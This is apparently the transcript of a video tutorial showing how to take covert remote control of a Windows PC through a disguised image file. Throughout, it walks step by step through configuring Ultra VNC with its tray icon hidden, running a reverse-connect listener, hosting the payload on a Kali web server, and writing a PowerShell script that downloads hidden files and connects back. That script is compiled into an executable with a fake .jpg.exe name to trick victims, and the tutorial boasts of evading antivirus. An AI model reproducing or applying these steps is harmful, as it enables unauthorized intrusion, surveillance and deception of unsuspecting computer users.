Today I'll be teaching you how to remotely control a PC by sending an image to the user. And once they click onto the image, that's it. We have full remote control of the computer. We can see everything they're doing, and we can even click around. And the craziest part of all is that this will not be detected by antivirus. That's crazy. And before we get started, kids, remember, hacking is illegal. Always ask your mom for permission first before you start hacking. If you want to hack me. Hack my computer, find my IP address, find my username, find my password, try to log in to my accounts. And I promise you, I will help you find out your password the moment I get your IP address. It's free of charge. Now, to protect yourself from hackers, remember to subscribe to the channel and turn on notification so that whenever you get hacked, you get notified. And this is what we'll be learning today. The first thing you need is a laptop, a computer, so that we're able to remotely control it. Next, you need a hacker. So of course, in this case, we have Mr. Hackerloy who can be helping you out targeting the device. And what Mr. Hackerloy will be doing is to create an image, and within this image there is an executable that will then download certain files that will allow us to remotely control the PC. So once the user opens up the file, it will then go over into a listener set up by Mr. Hackerloy that allow us to now fully control the computer. Sounds really cool, isn't it? I know. So right here I have a computer that is running. And of course, in this case, you can open up your favorite browser. So in my case, it will be Internet Explorer. So once we're here, what we need to do is go to uvnc.com. So in uvnc.com, which is Ultra VNC, you can head over into, say, Ultra VNC 1.3.2. So once you're here, what we need to do is not to download x86 setup. It is not to download x64 setup. It is but to download the bin zip file, because we do not want to go through the installation process when we have the user executing onto the file. So as you can see here, I have already downloaded the file. I can double click onto it and we can head over to x86. And in this case, what we want to use is the winvnc.exe. So what I'll do is go ahead and delete the ultra vnc.inm, which is just basically all different type of settings that you set up the moment you turn this on. So you can see over here, we have the information of permissions, admin, file transfer, and da-da-da. So all this are the information that's available when you set it up for the first time. So what I'll do now is do a right click on this, click delete. And what I will do next is to double click on the winvnc.exe, and this will bring us over into the server property page. So with that, what we can do is set up the VNC password. So in my case, I will use 123456778 as the password, 123456778. And next up, we head over to the advanced option. So in advanced option, as you can see here, there are several things that we can do. And one of it is to ensure that the user would not see any type of notifications, especially when they run this executable. So here we have the disable tray icon. Click apply, click OK on this, and done. You can see the ultra vnc.ini file has now been created. Next up, I have another Windows computer running right here who will be listening. So if I head over into command prompt, you can see right here, we have navigated over to Ultra VNC 134. And what I can do now is say, head over to x86, and we can start up our listener. And all we got to do right now is enter vncviewer.exe-listen 4444. Hit enter on this, and now we're listening. So if you hit down to the bottom, you click onto Task Manager, and you can see over here on the Task Manager, if you see the background process, we have the following of VNC Viewer 32-bit. The other option to look like a hacker, of course, is to use netstat from command prompt. So in this case, we have -ANO, you hit enter on this, and we have a lot of results. So what we can do is to filter on this by using find and the port of 4444. Hit enter on this, and you can see right here, we have the port 4444 that is listening. Heading back to the victim's computer right now, all I got to do is go ahead and hit enter onto CMD, and we're now inside the directory in command prompt for this directory or folder. And all we got to do right now is enter the following of winvnc.exe-connect followed by the target IP address. So in this case, if I head back over to the attacker's machine, I can enter the following of ipconfig, all right, and you can see the following IP address of 192.168.0.131. So this is the hacker's machine that is listening. And what I will do now is head back over to the victim, all right, 192.168.0.131 followed by port 4444. Hit enter on this. Oh, wait, sorry. The correct instruction or command should be the following of colon. Hit enter on this. Done. You don't see any pop-ups. You don't see any form of notifications that the computer has already been remotely controlled. So if I hit back over into the attacker's machine, you can see right here, we have the remote connection. And all I got to do right now is to go ahead and go under settings, all right, all the connection options. And what we can do now is to scale this down a little. So let's say to 50%, click OK. And you can see right here, we are inside the computer now. We can move files. We can see what the user is doing. We can even send a message to the user. So this is super cool. I open chat and I say, you have been hacked by Mr. Hacker Boy. I click send on this. All right. And I hit back over to the other computer and it states the following IP address. And I say, thank you. I know what you're thinking. Can we do it in Kali Linux? So right here I'm on Kali Linux, our favorite ethical hacking operating system. And all I got to do is enter IP-ADDR, and we can see the IP address of 192.168.0.117. So with that, all I got to do right now is same thing. Set up a listener. So I enter, say, VNC viewer, go ahead and enter -listen, hit enter on this, and we have the default port of 5500. And same thing, if you want to know exactly what is being listened, you want to know exactly if we have this set up properly, all you got to do is to go ahead and enter, and you enter netstat TULNP. All right, so this is again availability for us to see that we have the following of port 5500 and the VNC viewer, which is the program. Now heading back over the target machine, all we got to do is enter winvnc.exe, connect to the IP address of Kali Linux, and of course in this case the port of 5500. Hit enter on this. Okay, done. There's no notification. There's no alert, there's no alarm, nothing. So if I hit back over to Kali Linux right here, you can see it pop up. Tight VNC application mode. We are in. We're able to remotely control the computer, as simple as that. So what we need to do now is to go ahead and download the two files. The first file is ultravnc.ini and the second file is winvnc.exe. So what I can do here is go ahead and enter the following SMB client, and we will head over to Windows Hacker /downloads-u Loi Liang Yang. Hit enter on this. Oh, in this case, it should be capital U. And then now we enter the password 1234567 and we are in. So what I can do here is go ahead and enter, say, dir, and we can head over, cd over into the Ultra VNC, all right, 132. And then cd to x86. So over here we can see the two files, ultravnc.ini as well as winvnc.exe. So let's go ahead and download them. So in order to download them, all you got to do is enter get ultravnc.ini and then followed by get winvnc.exe. Done. So go ahead and exit on this. And what we can do now is go ahead and shift these two files over to var www.html. So you enter move the following of, say, winvnc to var www.html, and then go ahead and hit enter on this. Enter super user do. Enter 1234567 done. So now let's go ahead and do it for the next file. So in this case, we have the next file of ultravnc.ini. Hit enter on that. Again, super user do. Done. Next up, what we need to do is enter sudo systemctl start apache2.service. So this is our web server that is hosting these two files. So you can do a simple verification of this by heading over into 192.168.0.117. So in this case, we can enter the following of winvnc.exe, hit enter on that. Or, sorry, I spelled it wrongly. So winvnc.exe, and you can see the following right at the bottom. All right, it states that we have what do you want to do with this, so we can download this specific file over here. Now what we have here is the PowerShell script that we'll be using to be executed within an image. So you can see right here we're downloading the file. So we have the URL of 192.168.0.117 ultravnc.ini, and we're going to place it into the desktop folder, and we are going to, of course, make them hidden. So you can see right here we have the system IO file attributes hidden. So we can also download the winvnc.exe and also a specific image over here that we're going to save as hackerloy.jpg. And then right at the bottom, you can see right here we have the dash connect parameters into the Kali Linux IP address and port 5500. And towards the end, we're going to execute on them. So we downloaded the files. We're now going to execute on them. We execute the first file, which is winvnc.exe. So we start up the server. Then next up, we throw in the argument to connect over to 192.168.0.117.5500 over here. And then finally, we open up the image, the fake as though we're opening up the image, but before the image was opened, we have already executed the remote control. So you can see right here, I've navigated over to the desktop directory or folder, and I'm going to execute on the Hacker Log remote viewer.ps1. Hit enter on this. Okay, we got a couple of errors, but we'll try to fix them later on. So over here, if I hit back over to Kali Linux, oh, that's it, done. We have access now. So it seems to be a download issue. So let me go ahead and fix it for you. So let's go back over into the Windows computer, and I'm going to close off this image that's been downloaded and open up. I go over to Task Manager. I'm going to go ahead and close, all right, the VNC server and task for that. And I'm going to minimize everything. So we got this downloaded files. I'll go ahead and delete them, as well as the Ultra VNC.ini, delete that as well. Head back over into PowerShell. So let's go ahead and run this one more time to make sure that we have a clean copy. All right, so let's go ahead and head back over to Kali Linux. Let me run the listener once more. Head back to the victim computer, run the script, hit enter, and that clean. So the moment the user executes this for the first time, we're able to cleanly remotely control their PC, as you can see right here. So what we need to do next is to go ahead and create an executable file from the PowerShell script. So in this situation, we have the following target of Hacker Log remote viewer.ps1. We have the icon file that's been converted from JPEG, and we're going to select on the suppress output and suppress error output. And once you're ready, click compile. And once you click compile, you can see right here there's a pop-up that says the following: reading input file, compiling file, and an output file has been read. So hit enter to leave. Done. So you can see right here with the creation of the executable file, you can do a right click on this, click on the properties, and we have the properties of the following. All right, this is the location, all right, compatibility, security, details, and so on. And you can see that I have the file copied over here, so it can be sent through an email, it can be sent whatever. So we can do a right click on this, and we enter the following of .jpg, hit enter on that. So we have two extensions, right? So JPG followed by .exe. So if you notice, something that comes with default from a Windows standpoint is that file name extensions and hidden items are all unchecked. So in that case, you don't see anything over here. And once the user double click onto this JPEG file, it will open up the file. But before it even opens up the file, it would have ran those execution that allows remote control of the computer. Double click on the JPEG file. Okay, now we hit over Kali Linux. Let's see what we get. Boom. Done. We're in. It's game over. I hope you learned something valuable and you want to subscribe to the channel. Stay tuned for even more exciting tutorials for you.